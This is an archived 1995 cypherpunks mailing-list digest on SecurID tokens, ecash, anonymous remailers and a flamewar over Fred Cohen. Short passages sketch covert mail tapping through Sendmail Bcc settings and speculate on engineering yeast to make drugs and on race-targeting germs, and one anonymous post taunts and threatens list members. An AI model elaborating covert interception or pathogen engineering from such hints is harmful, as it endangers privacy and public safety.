You are referring to the ACE/SecurID token card from Security Dynamics.

In addition to the displayed number, you should be prepending it with a
memorized PIN; this prevents operation in case of theft.  The server end
will disable the card after x failed attemps, etc.  Otherwise it is
basically a one-time password system.

I've had a business relationship with these folks for a year or so now--
sharp guys.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R. J. Harvey" <harveyrj@vt.edu>
Date: Sun, 31 Dec 1995 12:33:34 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
Message-ID: <199512310359.WAA23216@quackerjack.cc.vt.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 08:15 PM 12/30/95 EST, you wrote:
>
>In my experience, people who get so hysterical when a Ph.D. calls himself or
>herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives
>trying and failing to attain a Ph.D. and are bitterly envious of those who have
>succeeded.
>
   Well, my experience is exactly the opposite: the
ones who have to brandish the "Ph.D." label are the
ones who were the least secure in their abilities,
and the ones who seem least deserving of having ever
graduated.  Often the same folks who feel compelled
to put "Dr." in their 'from' lines.  
   This is from one of the numerous people on this
list who have Ph.D.s and who don't wear them on
their sleeves (and who only "wasted" 3 years of his
life in getting one)...

rj







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sun, 31 Dec 1995 14:52:33 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <8iiygD48w165w@bwalk.dm.com>
Message-ID: <199512310509.XAA24032@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> [yet another very long flame directed at Dr. Fred Cohen]

Well, it wasn't directed specifically at Fred...

> > Just remember - PhD means 'piled higher and deeper'.

> > Finger ecarp@netcom.com for PGP 2.5 public key   an88744@anon.penet.fi

> I wonder why you put your anon.penet.fi address in your signature.
> There may be a perfectly reasonable explanation that I didn't think of :)

Well, yes, there is. :)  It's so that folks may correspond with me 
anonymously if they wish to do so.  Some people don't want me knowing who 
they are....
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOYbDyS9AwzY9LDxAQFMLAP/Z1Y6XkSBpX+EA/ooiOU5hfn4Sx0+pWH+
pe4SHGhS7B9iSqX55/3YNq16ZXeA/mBzqF0d9XiWUZa/Qs8u5MaFqID1BbHM65Bk
DrhGcP5YDSDLykY1z7mzLw9ItHM35UUDvygk0M3CNcerEZZd5C29kfg3SkwgOh55
aFNE8vMbsbU=
=LTOA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 13:54:18 +0800
To: cypherpunks@toad.com
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <199512310155.TAA12831@dal1820.computek.net>
Message-ID: <8iiygD48w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
[yet another very long flame directed at Dr. Fred Cohen]
> Just remember - PhD means 'piled higher and deeper'.
> - --
> Ed Carp, N7EKG                  Ed.Carp@linux.org, ecarp@netcom.com
>                                 214/993-3935 voicemail/digital pager
>                                 800/558-3408 SkyPager
> Finger ecarp@netcom.com for PGP 2.5 public key   an88744@anon.penet.fi
                                                   ^^^^^^^^^^^^^^^^^^^^^
I wonder why you put your anon.penet.fi address in your signature.
There may be a perfectly reasonable explanation that I didn't think of :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sun, 31 Dec 1995 15:33:17 +0800
To: cypherpunks@toad.com
Subject: Compuserve and copyrights
Message-ID: <199512310542.XAA25896@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

I have sent Compuserve a notice that all posts originating from this site 
are copyrighted and barred from being stored on a site that does not 
allow reciprocal access.  I would urge that other sites consider sending 
a similar notice to Compuserve.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOYi1SS9AwzY9LDxAQFdagP/VMdunjZ1LLY7nUVgxUgFEoHDdcyPwWLl
oPTQ/jDdcsIfolBQlNp+IzKJyubutW7oUv0qmsInAlXBUDPGvTmgyhPVczud7U79
JQh/ssxCiWZbTHwwwpJyg8Iw+jjAvrNTe4sWh/NOCM/Y3+knIckEm8k5DXA3BTCV
0+fkcV6sf+o=
=dQU8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Sun, 31 Dec 1995 13:40:40 +0800
To: Cees de Groot <C.deGroot@inter.nl.net>
Subject: Re: Australian "calculatorcard"
Message-ID: <01HZFQH4O0R695OXTW@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: Cees de Groot            \ Internet:    (cg@bofh.toad.com)
To:   cypherpunks              \ Internet:    (cypherpunks@toad.com)

Subject: Australian "calculatorcard"

Hi everybody,

CG> Yesterday, on UK Discovery, there was an item in the programme
CG> Beyond 2000 about an Australian card which implements a
CG> challenge-response protocol and can be used for banking, etcetera.
CG> Basically, you give your card number (over the phone), get a
CG> challenge number, enter your pin and the challenge, and then give the
CG> response. All in CC format...

sounds like the card i use for remote dialup to certain non-public
systems i use at work. it has a six digit number on the front that
changes every 60 seconds. the card is registered to me. when i enter
my username/password i'm prompted for the number. it's Pretty Good
(tm) security, but like anything not biometric, it is vulnerable to
black-bag attacks. physical possession being all that is required. if
you know the algorithm and the serial number of the card and the
time, even that isn't necessary.


CG> Can anybody provide me with pointers to more in-depth information
CG> about this device and the algorithm(s) behind it ?

i don't know if there are any net sources for them, but i'd be
suprised if not. my card references "security dynamics" of cambridge
massachusetts.

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
December 30, 1995   23:29

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMOYRtIdTfgZXlXydAQGengf9EH07ubUAH43THj3l+6kWUjnXDYfe2DFj
CvpEKlFoDkxwllDcIX0KfWK+ENr3YzyQp/yuWU+ZAw/ogci3y5r4IF+oJ4ItrVD6
pZ4AzF5NvXb2KWcnSaQoVsfo3yIt0bfRknuQjGyirntNhLpTkObVygbUmSSNeT8S
hrpGB85IkEoy/km3pntCMfrfA0BrED3GCnNLxVYupY7jM7AxbD+mjHvS8to63bPv
68xjB93b+78ld/O0FPsOP7GQMbUZyTJMiLoNwiMhbgEi8Y4dFTlZ6mF6NMHsDxDy
p/ocbp2dOj0Vy/BFbfbBqCgdjY3FoExRRHpgav8b0Xd4qNydkFDelg==
=MSp2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@boston.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 31 Dec 1995 14:45:36 +0800
To: cypherpunks@toad.com
Subject: Re: [ecash] Re: Multi-issuer questions
Message-ID: <199512310504.AAA18856@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have to admit I don't know the ecash concepts well enough to respond
very intelligently to everything you talked about, though I'd like to
address one of your comments on inter-bank clearing.

I wanted to bring up one misconception: you mention that the main worth
of ecash is measured by whether merchants will accept it as payment,
and that whether a bank will accept it as a deposit is just a secondary
issue.  From this you conclude that so long as a merchant can validate
ecash (via online clearing, to detect double-spending), it doesn't really
matter whether that merchant's bank will accept the ecash -- just that
other merchants will accept the ecash.  This is brought up in the context
of "what if Bank B didn't accept [deposits of] ecash from Bank A?".

I claim that this is at best misleading, because with Digicash's ecash,
when a merchant receives ecash as payment, the ecash is "made out" to
that particular merchant, and is non-transferable-- i.e. can't be
used as payment to another merchant.  When you've been payed Digicash
ecash, about the only interesting thing you can do is deposit it with
your bank.

[ For simplicity, I'm ignoring wildcards in the "pay to" field; but
wildcards are insecure on their own.  Digicash hasn't really attempted
to support wildcards or transferable ecash in general, as far as I
can tell.  Correct me if I'm wrong. ]
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOYZwCoZzwIn1bdtAQFvaQGA1f4oy6Z2TF9810fIUEqkktpQN01FPUCb
ER/q3WI/kuyjQCBJh/laA0QsU2q8jnP4
=8Mib
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 15:23:21 +0800
To: cypherpunks@toad.com
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <199512310509.XAA24032@dal1820.computek.net>
Message-ID: <gFkygD49w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> > I wonder why you put your anon.penet.fi address in your signature.
> > There may be a perfectly reasonable explanation that I didn't think of :)
>
> Well, yes, there is. :)  It's so that folks may correspond with me
> anonymously if they wish to do so.  Some people don't want me knowing who
> they are....

This is fascinating! Could you please explain (for the benefit of clueless
Ph.D.'s like myself) how putting your anon id in your signature enables folks
to send you anonymous e-mail, who couldn't do that before by e-mailing
anon@anon.penet.fi and adding:

X-Anon-To: erc@dal1820.computek.net

(E-mailing erc%dal1820.computek.net@anon.penet.fi might work too.)

I do see how it stops you from being anonymous when you post via that
particular anon.penet.fi address, but that's a different issue.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 31 Dec 1995 16:15:55 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <gFkygD49w165w@bwalk.dm.com>
Message-ID: <199512310524.AAA01241@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> > > I wonder why you put your anon.penet.fi address in your signature.
> > > There may be a perfectly reasonable explanation that I didn't think of :)
> >
> > Well, yes, there is. :)  It's so that folks may correspond with me
> > anonymously if they wish to do so.  Some people don't want me knowing who
> > they are....
>
> This is fascinating! Could you please explain (for the benefit of
> clueless Ph.D.'s like myself) how putting your anon id in your
> signature enables folks to send you anonymous e-mail, who couldn't
> do that before by e-mailing anon@anon.penet.fi and adding:
> X-Anon-To: erc@dal1820.computek.net > I do see how it stops you from
> being anonymous when you post via that particular anon.penet.fi
> address, but that's a different issue.

Gee.. you would think a high and mighty Ph.D like yourself could do a
little better then petty-bickering.

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 31 Dec 1995 16:20:49 +0800
To: jonnyx@edge.edge.net (jonnyx)
Subject: Re: (NOISE) Re: PLA_gue  Germ Terrorism
In-Reply-To: <199512310354.VAA02877@edge.edge.net>
Message-ID: <199512310701.BAA01450@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> Think that's fun? How 'bout this: given that the initial "mapping"
> phase of the human genome project is nearly complete, and the huge
> amount of genetic information available on the net, PLUS ever-
> more-powerful-yet-less-costly computers anyone can purchase, just
> how long do y'all think it'll be before some nut whips up a bug
> that targets, say, people with negroid genetic characteristics?
> Or epicanthic folds? Or blonde hair?
> 

Malarky.

> Seem kinda far-fetched? The November NUTS & VOLTS has a nifty 
> six page article on garage genetic experimentation (how to convert
> that old aquarium into an incubator, culturing techniques, etc.).
> They even list souces for equipment AND GERMS. Yes folks, you can
> order your very own "E-Z Gene Splicer DNA Recombination and
> Transformation Kit" from the good folks at Images Company, POBox
> 140742, Staten Island NY 10314, (718) 698-8305, $49.95 each,
> not recommended for children under 6 (too many parents complaining
> about mutated family cats).
> 

While it is quite possible to obtain equipment and supplies from any
reputable science supply center (I like Brodehead-Garrett & Cenco myself) it
is not cheap. The type of equipment that can be made out of aquaria and such
is very low-level and poses little threat *provided* isolation proceedures
are taken. The types of 'genetic' experiments that can be done at this level
are quite simple and generaly explore characteristics that are based on the
crossing models of Mendelson. Most of the threat of this type of experiments
are from simple infections since viruses are not easily raised with this
form of equipment.

One of my favorite 'technology rulers' is when the first strain of commen
yeast is released which produces THC or LSD. Both of these chemicals are
relatively simple to produce at a cellular level and Marijuana was
completely mapped just a couple of years ago. Yeast has been mapped for
several years and there is a whole technology of protocols based around
using it (or E. Coli) for laboratory experiments into secondary and tertiary
production systems in cells. The reason that I use Marijuana or LSD as a
test is that neither are the result of direct protein synthesis. They are
rather produced as a result of cellular metabolism of primary componants.
Both of these require garage level control and access to only the most basic
tools and sequencers. To do this successfuly will require somebody to take
the necessary genomes out of the choromosomes and then using a virus and
suitable cutting agents insert them in the yeast. I do not believe we will
see this in the near term using the micro-manipulater systems which do
direct injection of genetic material because of the cost and utility
requirements of such equipment.

> Quote from the article: "A word of caution is in order before we
> start. Although the materials in the kit are safe, it is important 
> for you to follow simple procedures to keep the experiment controlled
> and nonthreatening." No shit. E-coli bacteria (what the kit uses)
> aren't pathogens, but still... I guess every budding young white
> supremist/right-wing religious nut/genocidal maniac has to start
> somewhere. 
>  

E. Coli can be quite toxic. The people who died last year because of the bad
burger at the Jack In The Box died from E. Coli. There are hundreds of
strains of Esherichi Coli and not all of them are benign.

There is also a long history of this type of experimentation, it is not new.
Scientific American put out a book in the late 50's and early 60's that had
a whole slew of 'Amateur Scientist' articles compiled and several of them
related to this technology.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 31 Dec 1995 18:14:03 +0800
To: jya@pipeline.com
Subject: Re: PLA_gue  Germ Terrorism
Message-ID: <01HZFUC4ZW4W8Y56CR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: John Young <jya@pipeline.com>

>  12-30-95. To update the list of terrorist threats, the Wash
   Post reports on the purchase in May of bubonic plague germs 
   by "white supremacist" Larry Wayne Harris, his bust by the 
   FBI and germ teams, prosecutors amazement that possession 
   of such deadly micro-organisms is not illegal, and the 
   consequent plea bargain of wire fraud with probation.

   The article explains that possession of "terrorist" mites
   is not prohibited due to a legal loophole which allows
   scientific trade in wee supremacists. There are calls for 
   outlawing the meat-eaters by closing the gap in the 
   anti-terrorism bill before Congress. But scientists say 
   how dare you spit in our nanodeath soup.

   It notes that offshore spread is Commerce regulated.
-------------
	There are very good reasons for keeping this legal loophole. How could
one ship, say, Ebola virus for evaluation if it wasn't there? Besides which,
E. Coli (the workhorse of prokaryotic genetics) can be a pathogen if the
right plasmid is inserted. Banning shipment, buying, etcetera of strains of it
would rapidly reduce most genetics work in the U.S. to the state of gene
therapy work in Switzerland (i.e., none, due to the Swiss laws outlawing any
form of it).
	Incidentally, thanks to the person who quashed the "black-seeking
virus" idiot. Human races are so far from being proper genetically distinct
subspecies that nobody competent would call them that, if they only weren't us.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sun, 31 Dec 1995 17:35:43 +0800
To: cypherpunks@toad.com
Subject: Re: Australian "calculatorcard"
Message-ID: <v02130502ad0be4ca497f@[198.115.179.213]>
MIME-Version: 1.0
Content-Type: text/plain


Cees de Groot (cg@bofh.toad.com) tore himself from the tube to tell us:

CG> Yesterday, on UK Discovery, there was an item in the programme
CG> Beyond 2000 about an Australian card which implements a
CG> challenge-response protocol and can be used for banking, etcetera.
CG> Basically, you give your card number (over the phone), get a
CG> challenge number, enter your pin and the challenge, and then give the
CG> response. All in CC format...

        Could be one of seven or 8 vendors of so-called
"challenge/response" tokens or calculators.  Most of those sold in the US
and Australia use straight DES (and a token-specific key) to encrypt the
"random" challenge number in the token -- but it could be any secret-key
algorithm.

        Actually, the particular environment described -- phone
authentication -- is often used as the most notable example of a market
where so-called "time-synchonous" tokens hold a  notable advantage over
challenge/response token. A TS token generates its pseudo-random
token-codes continuously and automatically: no buttons, no input.

        With TS tokens, exact time and a token-specific key are used in a
keyed hash to generate a token-code displayed on an LCD on the token for 30
or 60 seconds.   The authentication server uses its database record of the
token-specific key, time, and the hash to generate the same token-code for
a match.  This allows a PIN and token-code two-factor authentication to be
submitted by touch-tone phone, and it avoids a lot of the hassle
(listen/tap/calculate/touch-tone) associated with C/R authentication.

        As amp <Alan.Pugh@internetMCI.COM> noted, the most prominent
international vendor of time-synch tokens is a US firm called Security
Dynamics, Inc.  I've done consulting projects for SDI, off and on, for
years.

>sounds like the card i use for remote dialup to certain non-public
>systems i use at work. it has a six digit number on the front that
>changes every 60 seconds. the card is registered to me. when i enter
>my username/password i'm prompted for the number.

        SDI's token is called a SecurID. <http://www.securid.com>  SDI uses
a <sigh> proprietary hash.  The most common app uses a SecurID in a
protocol which prepends the PIN, in the clear, to the PRN token-code. (In
client/server environments, of course, all communication between an SDI
ACE/Client and the ACE/Server is fully encrypted.)  SecurIDs can also be
loaded with up to three different seeds or keys -- with a pressure-point in
one corner to switch between each series of key-based PRNs.

        For greater security in open networks, SDI sells a PinPad token
with a keypad that allows a PIN to be "added" to the PRN token-code -- so
the LCD displays a 6-8 digit number (or alphanumeric) which still offers
two-factor authentication, without exposing a PIN.

> it's Pretty Good
>(tm) security, but like anything not biometric, it is vulnerable to
>black-bag attacks. physical possession being all that is required.

        Actually, all ACE/Server or ACE software modules _require_ a
user-memorized PIN.  Physical possession of a stolen token is not enough to
gain illicit access.

>if
>you know the algorithm and the serial number of the card and the
>time, even that isn't necessary.

        Bleep!  Earth to amp! Check your voltage, lately?  The token's
serial number has nothing whatsoever to do with the generation of a
SecurID's PRN token-code.

        Just because SDI ships its SecurIDs pre-loaded (most token vendors
ask the buyers to program their authentication tokens) SDI embosses a
serial number on the back of the token to manage shipping and distribution.
The serial number stuck to the back of a SecurID after it is programmed
with its secret key -- a unique PRN "significantly longer" than 56 bits --
but they are not the same thing.  The cpu in a SecurID doesn't even "know"
the serial number stuck on the back of the token.

        (It would be Pretty Stupid <TM> to glue or emboss a secret on the
back of the damn token, wouldn't it?)  I should note that Alan is just
regergitating one of the most widely circulated  rumors about SecurIDs --
which like any popular crypto device attracts a lot of wiLd & w00ly
speculation.

        Getting the algorithm for SDI's one-way hash is no big deal, given
that it sits in software in thousands of SDI customer installations,
protected only by contract and trade secret status.  (The integrity of the
product -- the unpredictability of the token-code PRN series, and the
secrecy of a specific token's seed or key -- rightly depends cryptographic
strength of the hash, not the secrecy of the algorithm.)  Getting a
token-specific secret key would hopefully be a much greater challenge.

CG> Can anybody provide me with pointers to more in-depth information
CG> about this device and the algorithm(s) behind it ?

>i don't know if there are any net sources for them, but i'd be
>suprised if not. my card references "security dynamics" of cambridge
>massachusetts.


        Suerte & Happy New Year to all,
                                                                 _Vin

<*><*>< Vin McLellan + The Privacy Guild + vin@shore.net ><*><**>

Heed, fellow citizens, Justice Felix Frankfurter (Butler v. Michigan):

       "The State insists that, by thus quarantining the general reading public
against books not too rugged for grown men and women in order to shield
juvenile innocence, it is exercising its power to promote the general
welfare. Surely this is to burn the house to roast the pig.... The incidence
of this enactment is to reduce the adult population of Michigan to reading
only what is fit for children."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 31 Dec 1995 17:31:10 +0800
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Internet wiretap?
Message-ID: <v02140a04ad0bef0837f0@[165.254.158.214]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:09 12/29/95, Joel McNamara wrote:

>This tidbit was posted a few hours ago on c|net (12/29 4:00 PST).
>
>        Thanks to a wiretap on the Internet, three people have been arrested
>for illegally
>        selling and manufacturing cellular phone equipment and electronic
>devices over the Internet,
>        according to Secret Service agent Brian Gimlett. This is the first
>time the Secret Service and the
>        Drug Enforcement Administration were allowed to wiretap via the
>Internet, says Gimlett.
>
>The rest of the story talks about an exchange of e-mail discussing the sale
>of various nasty
>cellular accessories.  There is no information on exactly what "wiretap"
>means or any other
>technical details.  Interesting to note the DEA was in on it.

It is not that hard to "tap" a user's account if you are the SMTP server
(you just put a Bcc on all outgoing mail and add an extra account to all
incoming mail's Envelope). A few lines in the Sendmail parms would do this
very simply.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Sun, 31 Dec 1995 11:30:33 +0800
To: cypherpunks@toad.com
Subject: Trolling for L00ns was Re: is Freddy Boy a Loon
Message-ID: <199512310305.EAA03110@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain




Ah... the targets bit perfectly... You  see
fred my boy being zapped by a nym wouldnt hurt SO
bad unless on some level you believed the anon posters 
assertions about your behaviours were TRUE...
you reacted exactly as predicted, as have David Sternlight,
L Detweiler and a host of others... I normally lurk except when
I get a chance to send anon barbs to puncture an EGO as
inflated as yours..

    anon
p.s. You are next vlad...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 31 Dec 1995 19:20:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: anon.penet addresses in .sigs
In-Reply-To: <gFkygD49w165w@bwalk.dm.com>
Message-ID: <199512311100.GAA18408@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Subject: Re: anon.penet addresses in .sigs
To: cypherpunks@toad.com (Cypherpunks Mailing List)

Dr. Dimitri Vulis writes:
> This is fascinating! Could you please explain (for the benefit of clueless
> Ph.D.'s like myself) how putting your anon id in your signature enables folks
> to send you anonymous e-mail, who couldn't do that before by e-mailing
> anon@anon.penet.fi and adding:
> 
> X-Anon-To: erc@dal1820.computek.net

This issue (the penet address in Ed's .sig) has been covered on the list 
before. The next time around I think I'll write a short FAQ.

The direct address is easier to use, especially for people whose mailers
don't allow them to add arbitrary email headers. Note that the ratio of
users of the various cypherpunk remailers to users of anon.penet is even 
lower than the S/N ratio on this list in December.

In certain parts of Usenet, many people routinely advertise addresses at
anon.penet (and similar services) in their .sigs (as Ed does) to make 
pseudonymized replies as convenient as possible. This is not a new phenomenon.

Happy New Year !

Futplex <futplex@pseudonym.com>		Brand new key, ID: 0x0F5470D9 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMOZtGynaAKQPVHDZAQGijAf+Ivi2IklP1cJBhDb4/VTm0d0zd/kjJRhh
4BlGShGcQayfKP59jKFBUO/gbqFzjxsdCRuJcL5D7VXOOX4gjjWxqfKM6ora/nGx
f3mr+DQO2VhhWrHcXqiURwWBknw37fGWQUMfq8DIVWgiVn5e2EkmTNwzyuY+wRm+
30xddxfjN2R5eS/DLr9Ebg+VYLvcHQ3kOvbzhHk3ZVI1x21DlT3I/3u5828OB10p
s3bpADToW1TbT1o7VrMvKtLla1CYBqJrGpSkPCCm0mG4Qx2UWDuWXr9Ej3m1fWVQ
eQI0FFb6Qm+0mzVcQnexTtj+btrqPler5oQBiQmLMuWdohB0cOtRMw==
=va+w
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Jan 1996 03:25:48 +0800
To: cypherpunks@toad.com
Subject: Can We Cut the Crap?
Message-ID: <ad0c14fb020210041a1c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Really, the S/N ratio is approaching all-time lows, even for the Silly
Season of Xmas. A week or so ago there was a massive flame war involving
insults and counter-insults--I returned from my Xmas vacation to find the
list melting down. Now, a week later, a new flamewar has erupted.

There is no point in the back-and-forth of insults, "Dr. Fred is a loon,"
"Alice is Detweiler," and other such nonsense. If you don't want to read
the comments of Fred Cohen, Dimitri Vulis, Alice whatever,
Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete
them immediately, read them briefly, whatever.

At 5:04 PM 12/31/95, deadbeat wrote:

>Regarding Fred Cohen, PhD:
>

[typical personal insults elided]

>Let's also consider the granting institution, a second-rank school.

Well, not quite. I seem to recall that Cohen's advisor at USC was Len
Adleman, known perhaps to some of you as the "A" in RSA and more recently
as the guy doing the "DNA computing" work. He was also working on viruses,
perhaps in conjunction with Cohen, as of 1987-88, and gave an interesting
paper at the 1988 Crypto Conference on "An Abstract Theory of Computer
Viruses." Not surprisingly, Cohen's papers were the main citations.

I recall Adleman describing in the oral talk just how it is that
determining if a given program contains a virus is essentially equivalent
to solving the halting problem, i.e., it may be undecidable whether a
program has a virus, except presumably in some special cases (e.g., for
very small programs).

>Cohen's thesis broke new ground, but how many people have read it, or any of
>his writings, or know anything about his ideas beyond a single word?  How far
>did he carry this work?  Where are the conference and journal papers?  Cohen's
>reputation faded into obscurity long ago.  Now he is building a new reputation
>as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.

I have plenty to disagree with some of what Fred Cohen says, as I do with
many people, but this is just plain ignorant.

"How many people have read it, or any of his writings..." is a ridiculous
argument, even for an ad hominem. Those who want to read it, can read it.
The articles are readily available. I've even seen some of his books on the
bookshelves of my local bookstores (haven't read them, though I flipped
through "It's Alive!" and didn't see much of interest....but how many of us
have written _any_ books?). I'm not convinced there's much more about the
_theory_ of viruses to "push forward," for various reasons. The theory was
laid out, some Bulgarians and others are busily writing viruses, but
there's not likely to be some whole reservoir of new theory to be worked
on. (This is true of a lot of fields, where the work done decades ago
basically was complete....look at how we all cite Garey and Johnson and how
little has changed in the field of NP-completeness.)

Blasting Cohen because you don't think he carried his work far enough is
clearly blasting wildly. Have you asked whether others on this list have
carried the work they did in their early careers far enough? (Did I carry
my work in the 1970s on alpha particle effects on chips far enough, or am I
just a Cohen-like slacker because I moved on to other things?)

Anyway, if you don't like Sternlight, or Cohen, or May, or Detweiler, or
Metzger, or Vulis, *filter* them out!

So why don't I just do this? Well, I do have a filter file in my Eudora Pro
mailer, and I use it. But I still see the crossfire on the list, the
pointless flames and personal attacks. This angers and saddens me. Hence
this message.

While I don't subscribe to the extreme view espoused by some, that the
topics of the list should be exclusively crypto, math, programming, and
Internet standards, I do think people should try to find some relevance to
the larger themes of the list. The recent increase in "one-sentance
repartee" is indicative of late-stage list meltdown. (Some of the posts
here quote a couple of paragraphs, add one or two lines of insults, then
have another screenful of PGP sigs, auto-signing sigs, anonymous IDs, and
then a conventional sig. Jeesh!)

I'm hoping that this is just a Xmas vacation silly season.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Mon, 1 Jan 1996 05:30:47 +0800
To: cypherpunks@toad.com
Subject: The F.C. flamewar
Message-ID: <199512312115.NAA07063@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


You know, if I worked for an organization that was dedicated to restricting
strong crypto, eliminating people's privacy rights, monitoring and recording
everything that people say or write, etc. etc. ad infinitum, I'd probably
spend at least a part of every day sitting in front of my computer in my
little cubicle somewhere in Virginia, making posts to cypherpunks just like
these ... 

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Mon, 1 Jan 1996 02:46:01 +0800
To: an5877@anon.penet.fi
Subject: Re: Fred Cohen, PhD
